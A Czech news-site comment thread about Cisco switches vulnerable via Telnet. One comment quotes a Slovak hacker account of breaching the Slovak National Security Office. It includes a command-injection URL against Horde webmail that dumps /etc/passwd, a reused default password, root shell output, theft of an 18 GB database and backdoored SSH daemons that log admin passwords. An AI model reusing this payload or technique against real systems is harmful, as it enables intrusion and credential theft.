Názory k článku
Switche Cisco lze unést přes Telnet
-
KateStříbrný podporovatelS Ciscama jsem se učila na škole 14 let zpátky a už tehdy bylo nutné telnet explicitně zapnout… Takže nevím nevím jak je taková chyba zneužitelná…
-
Peter FodrekZlatý podporovatel
Preco. Oni len chcu "free time adminov", tak ako v NeBezpecnostnom Urade SR (oficialne Narodnom Bezpecnostnom Urade SR)
vsetko sa zacalo pri vtipkoch medzi kamaratmi, ktori si vsimli chybu v mailovom rozhrani na adrese webmail.nbusr.sk, pomocou ktorej bolo mozne vykonavat systemove prikazy na serveri. (ja viem, tato veta znie uplne napicu, ale tak nech chapu aj ludia menej zasveteni danej problematike ;))
tym padom bolo mozne prevziat zoznam lokalnych userov na masine.http://webmail.nbusr.sk/horde/services/help/
?show=about&module=;%22.passthru(%22cat%20%22.
chr(47).%22etc%22.chr(47).%22passwd%22);%27.do oci bil najma uzivatel s loginom nbusr
nuz...
kruty vtip - pouzit heslo nbusr123 - nam takmer roztrhol branice - heslo fungovalo (na prvy pokus). ukazalo sa motd a boli sme prihlaseni na masinepo chvilke skumania a behania po stroji sme skusili su na roota utok na branice cislo 2 :)
%su
www.nbusr.sk# id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
www.nbusr.sk# uname -a
FreeBSD www.nbusr.sk 6.0-RELEASE FreeBSD 6.0-RELEASE #0:Thu Nov 3 UTC 2005 root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386
www.nbusr.sk#nbusr@archive> su
Password:
nbusr@archive# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
nbusr@archive# uname -a
FreeBSD archive.nbusr.sk 4.10-STABLE FreeBSD 4.10-STABLE #1: Mon Feb 14 14:47:10
CET 2005 root@archive.nbusr.sk:/usr/src/sys/compile/ARCHIVE i386
nbusr@archive#dalsi zachvat branice..
z archivu sme si odniesli cca 18 gb databazu taktiez zaujimavou masinou bolo ep.nbusr.sk ;)
po ziskani tohoto hesla sa nam otvorila v podstate cela siet, kedze heslo fungovalo na vsetky ostatne zariadenia unixoveho (servre) alebo sietoveho charakteru (cisco routre/switche). vecer sa nasadili na masiny zabackdoorovane ssh demony, ktore nam zaznamenavali pohyb adminov po dalsich strojoch (aj s heslami of course :) )
http://linuxos.sk/blackhole/clanok/442/ -
lojzak (neregistrovaný)
Ze switchů řady SMB zmizel seriový port už dávno a pokud vím, tak tyto switche ani nenabízí možnost připojit se na TTY přes Telnet nebo SSH.
Obecně je problém mít SSH v defaultu (tj aby mi šlo na switchi, který jsem vytáhl z krabice a poprvé zapojil do elektriky). Jakým způsobem se budou generovat klíče? Jak to bude po restartu do tování konfigurace?
ČLÁNKY DO MAILU